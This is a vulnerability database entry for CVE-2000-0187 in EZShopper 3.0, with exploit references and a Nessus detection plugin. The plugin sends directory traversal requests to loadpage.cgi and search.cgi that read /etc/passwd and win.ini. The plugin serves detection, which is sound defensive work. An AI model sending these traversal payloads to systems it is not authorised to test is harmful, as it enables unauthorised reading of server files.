Vulnerabilities > CVE-2000-0187 - Remote Command Execution vulnerability in Alex Heiphetz Group Ezshopper 3.0

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
alex-heiphetz-group
nessus
exploit available

Summary

EZShopper 3.0 loadpage.cgi CGI script allows remote attackers to read arbitrary files via a .. (dot dot) attack or execute commands via shell metacharacters.

Vulnerable Configurations

Part Description Count
Application
Alex_Heiphetz_Group
1

Exploit-Db

  • descriptionEZshopper Directory Transversal in loadpage.cgi. CVE-2000-0187. Webapps exploit for cgi platform
    idEDB-ID:659
    last seen2016-01-31
    modified2004-11-25
    published2004-11-25
    reporterZero X
    sourcehttps://www.exploit-db.com/download/659/
    titleEZshopper - Directory Transversal loadpage.cgi
  • descriptionAlex Heiphetz Group EZShopper 3.0 Remote Command Execution. CVE-2000-0187. Remote exploit for multiple platforms
    idEDB-ID:19781
    last seen2016-02-02
    modified2000-02-27
    published2000-02-27
    reportersuid
    sourcehttps://www.exploit-db.com/download/19781/
    titleAlex Heiphetz Group EZShopper 3.0 - Remote Command Execution

Nessus

NASL familyCGI abuses
NASL idEZSHOPPER.NASL
descriptionThe version of EZShopper running on the remote host has multiple directory traversal vulnerabilities in loadpage.cgi and search.cgi. A remote attacker could exploit this to read sensitive information from the server. There is also an arbitrary command execution vulnerability in this version of EZShopper, though Nessus has not checked for that issue.
last seen2020-06-01
modified2020-06-02
plugin id10065
published2000-02-28
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10065
titleEZShopper Multiple Directory Traversal Vulnerabilities
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  # Plugin identity and the advisories it covers.
  script_id(10065);
  script_version("1.40");
  script_cve_id("CVE-2000-0187", "CVE-2000-0188");
  script_bugtraq_id(1014);

  script_name(english:"EZShopper Multiple Directory Traversal Vulnerabilities");
  script_summary(english:"Tries a directory traversal attack");

  # Report text. These are user-facing strings and are kept verbatim,
  # including their embedded line breaks.
  synopsis_text = "A web application on the remote host has multiple directory traversal
vulnerabilities.";
  description_text = "The version of EZShopper running on the remote host has multiple
directory traversal vulnerabilities in loadpage.cgi and search.cgi.
A remote attacker could exploit this to read sensitive information
from the server.

There is also an arbitrary command execution vulnerability in this
version of EZShopper, though Nessus has not checked for that issue.";

  script_set_attribute(attribute:"synopsis", value:synopsis_text);
  script_set_attribute(attribute:"description", value:description_text);
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Feb/437");
  script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of this software.");

  # The base vector scores only what this plugin actually tests (file
  # disclosure via traversal, C:P). The command execution side of
  # CVE-2000-0187 is not exercised here, which is why this vector is
  # lower than the CVE's overall rating.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");

  script_set_attribute(attribute:"plugin_publication_date", value:"2000/02/28");
  script_set_attribute(attribute:"vuln_publication_date", value:"2000/02/27");
  script_cvs_date("Date: 2018/11/15 20:50:17");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");

  # Runtime prerequisites: a discovered web service, and the user has not
  # turned off CGI scanning.
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


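# Sends one GET for `path` under the CGI directory `dir` and raises a
# warning when `marker` is found in the response body. A NULL response is
# treated as "server stopped answering" and ends the scan, matching the
# behaviour of the original inline checks. Returns only when the check
# was negative. Reads the script-level `port`.
function check_traversal(dir, path, marker)
{
  local_var req, rep;

  req = string(dir, path);
  rep = http_send_recv3(method:"GET", item:req, port:port);
  if (isnull(rep)) exit(0);

  # rep[2] is the response body.
  if (marker >< rep[2])
  {
    security_warning(port);
    exit(0);
  }
  return 0;
}

port = get_http_port(default:80);

# NOTE(review): NASL double-quoted strings do not process escapes, so the
# "\\" sequences below are sent as two literal backslashes, as in the
# original script — confirm this is intended before changing them.
foreach dir (cgi_dirs())
{
  if (is_cgi_installed3(item:dir + "/loadpage.cgi", port:port))
  {
    # loadpage.cgi takes the page in its `file` parameter; one Unix-style
    # and one Windows-style probe.
    check_traversal(dir:dir,
                    path:"/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd",
                    marker:"root:");
    check_traversal(dir:dir,
                    path:"/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini",
                    marker:"[windows]");
  }

  if (is_cgi_installed3(item:dir + "/search.cgi", port:port))
  {
    # search.cgi takes its paths in `database` and `template`.
    check_traversal(dir:dir,
                    path:"/search.cgi?user_id=1&database=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&template=..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&distinct=1",
                    marker:"[windows]");
    # Fix: the original sent this Unix-style probe to loadpage.cgi with
    # search.cgi's parameters, so the Unix search.cgi case was never
    # actually exercised in the search.cgi branch.
    check_traversal(dir:dir,
                    path:"/search.cgi?user_id=1&database=../../../../../../etc/passwd&template=../../../../../../../../../etc/passwd&distinct=1",
                    marker:"root:");
  }
}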